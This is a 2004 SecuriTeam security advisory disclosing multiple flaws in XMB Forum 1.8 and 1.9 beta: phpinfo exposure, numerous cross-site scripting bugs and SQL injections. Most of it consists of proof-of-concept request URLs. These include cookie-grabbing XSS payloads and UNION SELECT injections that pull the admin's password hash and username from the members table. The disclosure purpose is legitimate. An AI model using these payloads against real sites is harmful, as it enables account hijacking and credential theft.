Date: 30 Mar 2004 13:13:19 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [UNIX] Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative
Password Disclosure)
------------------------------------------------------------------------
SUMMARY
<http://www.xmbforum.com/>; XMB Forum is "a free web-based bulletin board
system written in PHP with a MySQL backend."
Multiple vulnerabilities have been found in XMB including several
cross-site scripting bugs, SQL injections and information disclosure.
DETAILS
Vulnerable Systems:
* XMB version 1.8 Partagium SP3
* XMB version 1.9 Nexus beta
PHP and web server information disclosure
Beginning with the new Nexus release of XMB, the file named phpinfo.php
has been added to the forum package. A snippet from the original code can
be used to reveal the PHP version and information about the web server:
<?php
/* $Id: phpinfo.php, v1.00 2003/10/11 10:45:18 Tularis Exp $ */
phpinfo();
?>
Not only that a user can access phpinfo(), there is a possible cross site
scripting vulnerability. An example follows:
http://localhost/xmb19beta/phpinfo.php?foobar=<;scr!pt>alert(document.cookie);</scr!pt>
Note that the SCRIPT tag has been replaced with SCR!PT.
Cross site scripting
http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar>;<body
onload=a!ert(document.cookie);>
Note: Logout before issuing the request otherwise it will not work. The
alert action was replaced with a!ert. Another cross-site scripting
vulnerability exists in editprofile.php (only the latest version 1.9 is
vulnerable). An example request that exploits it:
http://localhost/xmb19beta/editprofile.php?user=notexist_foobar&u2uheader=<;body onload=alert(document.cookie);>
A cross site scripting bug exists in u2u.php as well. An example would be:
http://localhost/xmb19beta/u2u.php?folder=foobar"><body
onload=a!ert(document.cookie);>
And in the stats.php file there is more than one cross site scripting bug
due to uninitialized variables ($viewmost,$replymost,$latest). Examples:
http://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&replymost="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body
onload=a!ert(document.cookie);>
Another XSS bug exists in post.php where the $message and $icons variables
are un-initialized.
Examples:
http://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/post.php?action=newthread&fid=1&icons=<;body
onload=a!ert(document.cookie);>
In the forumdisplay.php script there are also uninitialized variables
which open the way for cross site scripting. These are
$threadlist,$pagelinks,$forumlist,$navigation and $forumdisplay:
http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<;body
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<;body
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<;body
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<;body
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&forumdisplay=<;body
onload=a!ert(document.cookie);>
SQL Injection and cross site scripting
http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<;body
onload=a!ert(document.cookie);>
Note: It will only work when no user is logged on, otherwise the $tpp
variable will be overridden.
An SQL injection and a cross site-scripting bug in member.php (only
version 1.9 is vulnerable) exists. Here is a snippet of code take shows
the bug, line 461:
switch($self['status']){
case 'member';
$restrict .= " f.private !='3' AND";
case 'Moderator';
case 'Super Moderator';
$restrict .= " f.private != '2' AND";
case 'Administrator';
$restrict .= " f.userlist = '' AND f.password = ''
AND";
case 'Super Administrator';
break;
default:
$restrict .= " f.private !='3' AND f.private != '2'
AND f.userlist = '' AND f.password = '' AND";
break;
}
It is easily discernible that the $restrict variable is not initialized
and hence opens up an SQL injection:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar
Or a cross-site scripting if one wishes:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=<;body onload=a!ert(document.cookie);>
Better yet, it's possible to retrieve the admin's MD5 password hash from
the database in the following manner:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT password, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*
Or the admin's username:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT username, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*
Yet more SQL injections and XSS vulnerabilities exists, this time in the
misc.php script (only version 1.9 is vulnerable). Examples follow:
http://localhost/xmb19beta/misc.php?action=search&restrict=<;body
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/misc.php?action=search&restrict= private=-99
UNION SELECT null, null,password, null, null, null, null, null, null,
null, null, null, null, null, null, null, null, null, null, null, null,
null,null FROM xmb_members WHERE uid=1 LIMIT 1 /*
Another SQL injection and XSS in today.php exists. However only version
1.9 is vulnerable:
http://localhost/xmb19beta/today.php?restrict=<;body
onload=alert(document.cookie);>
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> Janek
Vind.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
